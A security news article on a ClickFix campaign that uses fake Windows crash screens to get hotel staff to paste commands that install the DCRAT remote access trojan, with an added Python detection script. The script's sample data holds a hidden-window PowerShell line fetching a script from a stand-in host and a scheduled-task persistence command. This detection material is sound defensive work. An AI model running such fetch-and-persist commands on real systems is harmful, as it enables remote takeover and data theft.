ClickFix Campaign Uses Fake Windows Blue Screen Errors to Trick Hotel Staff Into Installing Malware

By Ash K

A new wave of ClickFix social engineering attacks is targeting the European hospitality sector by abusing one of the most recognisable elements of the Windows operating system: the Blue Screen of Death. By presenting hotel staff with convincing fake crash screens, attackers are manipulating victims into manually executing malicious commands that lead to full system compromise.

The campaign combines phishing, browser-based deception, and hands-on keyboard interaction, marking a shift away from fully automated malware delivery toward attacks that rely on user compliance under pressure.

How the ClickFix attack works

The attack typically begins with a phishing message posing as a Booking.com reservation notification or cancellation request. Hotel staff are directed to click a link to view urgent booking details.

Instead of a legitimate reservation page, victims are redirected to a malicious website that abruptly displays a full-screen fake Windows Blue Screen of Death. The page mimics Microsoft’s crash screen layout, colour scheme, and language with high accuracy.

Fake Windows BSOD screen used in ClickFix attacks

The screen falsely claims the system has encountered a critical error and instructs the user to follow recovery steps to restore normal operation.

From fake error to real infection

Victims are instructed to open the Windows Run dialog or Command Prompt and paste a provided command. The instructions are presented as a system recovery procedure, often framed as guidance from Microsoft support.

Once executed, the command downloads and launches malware directly from attacker-controlled infrastructure. This approach bypasses many email and browser-based security controls because the user initiates the action themselves.

Malware deployed in the campaign

Analysis of the payloads linked to ClickFix attacks shows the use of DCRAT, a well-known Remote Access Trojan. DCRAT provides attackers with persistent access to infected systems, allowing them to remotely control the machine, execute commands, and exfiltrate data.

The malware is capable of keylogging, file theft, screenshot capture, and lateral movement within internal networks. Once installed on a hotel system, attackers can monitor reservation systems, payment workflows, and internal communications.

Why the hospitality sector is being targeted

Hotels and hospitality businesses operate under constant time pressure and rely heavily on third-party booking platforms. Staff are accustomed to responding quickly to reservation changes, cancellations, and customer issues.

Attackers exploit this environment by creating scenarios that feel urgent and operationally disruptive. A sudden system crash during peak hours increases the likelihood that staff will follow instructions without verification.

Scale and impact of the campaign

Security researchers tracking the ClickFix activity report multiple European countries affected, with hotels and short-stay accommodation providers making up the majority of known victims.

While exact infection numbers have not been disclosed, telemetry from incident response firms suggests dozens of compromised systems across hospitality networks, with potential exposure of customer data, internal credentials, and booking records.

Why fake BSODs are effective

The Windows Blue Screen of Death carries a strong psychological impact. Users associate it with serious system failure and loss of control.

By replicating the BSOD, attackers remove familiar browser cues and replace them with a scenario where users feel dependent on on-screen instructions. This significantly lowers scepticism, even among experienced staff.

Detection challenges

Because the malware execution is initiated manually by the victim, traditional detection methods may not flag the activity as suspicious. The command is often run using legitimate Windows tools, and the initial payload may be small and obfuscated.

By the time abnormal behaviour is detected, attackers may already have established persistence.

What organisations should watch for

Indicators linked to ClickFix activity include unexpected full-screen error pages delivered through web browsers, employees being instructed to run commands copied from websites, and outbound connections to unfamiliar infrastructure shortly after such events.

Security teams should also watch for new scheduled tasks, registry persistence entries, and unauthorised remote access tools.

Steps to reduce risk

Experts recommend training staff to treat any browser-delivered system error as suspicious. Legitimate Windows crash screens do not provide interactive instructions or ask users to run commands.

Restricting the ability of non-administrative users to execute command-line tools and monitoring for unusual PowerShell or cmd.exe activity can significantly reduce the effectiveness of such attacks.
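As an added illustration of the monitoring described in the two sections above (example code written here, not code from the article or from any vendor tool), the following Python triages constructed Sysmon-style process-creation records for the pattern the campaign relies on: a shell started from Explorer (where the Run dialog lands) with a remote-fetch or hidden-window cue, followed by persistence through a scheduled task or Run key. The record fields, hostnames, paths and command lines are all constructed sample data.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Interactive shells that a fake BSOD page typically tells the victim to paste into.
PASTE_TARGETS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# A parent of explorer.exe means a person launched it (Run dialog, Start menu,
# desktop) rather than a script, service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Generic "fetch from the internet" cues; a human typing a repair step rarely needs these.
FETCH_CUES = re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|bitsadmin", re.I)
# Encoded or hidden-window switches: unusual for an interactive, user-typed command.
EVASION_CUES = re.compile(r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|-nop(rofile)?\b", re.I)
# Persistence the article says to watch for once the payload is running.
PERSISTENCE_CUES = re.compile(r"schtasks(\.exe)?\s+/create|\\CurrentVersion\\Run\b", re.I)

@dataclass
class ProcEvent:               # subset of Sysmon Event ID 1 fields (assumed layout)
    host: str
    image: str
    parent_image: str
    command_line: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(evt: ProcEvent) -> list[str]:
    """Return reasons this event looks like ClickFix-style execution; empty means benign."""
    reasons: list[str] = []
    img, parent = basename(evt.image), basename(evt.parent_image)
    interactive = img in PASTE_TARGETS and parent in INTERACTIVE_PARENTS
    if interactive and FETCH_CUES.search(evt.command_line):
        reasons.append("shell launched from Explorer with remote-fetch cue")
    if interactive and EVASION_CUES.search(evt.command_line):
        reasons.append("shell launched from Explorer with encoded/hidden switches")
    if PERSISTENCE_CUES.search(evt.command_line):
        reasons.append("persistence via scheduled task or Run key")
    return reasons

def triage(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Keep only events with at least one reason, in arrival order."""
    return [(e, r) for e in events if (r := assess(e))]

# Constructed sample records: benign interactive use, a pasted fetch command,
# a follow-on scheduled task, and a script-launched download that is NOT interactive.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("FRONTDESK-01", PS, r"C:\Windows\explorer.exe", "powershell.exe Get-Date"),
    ProcEvent("FRONTDESK-01", PS, r"C:\Windows\explorer.exe",
              'powershell.exe -w hidden -nop -c "iwr http://example.invalid/fix.ps1"'),
    ProcEvent("FRONTDESK-01", r"C:\Windows\System32\schtasks.exe", PS,
              r"schtasks.exe /create /tn SysRecovery /sc onlogon /tr C:\Users\Public\svc.exe"),
    ProcEvent("INVENTORY-SRV", PS, r"C:\Windows\System32\services.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1 -Server https://inv.corp.invalid"),
]
```

Run against real Sysmon or Security 4688 exports, the parent-process check is what separates a pasted ClickFix command from the routine PowerShell that management agents spawn all day.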

What Next?

Security researchers expect ClickFix-style attacks to expand beyond hospitality into other service-driven industries where staff interact with external platforms under time pressure.

The campaign highlights how attackers continue to move away from purely technical exploits, instead focusing on deception that turns users into active participants in their own compromise.

Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.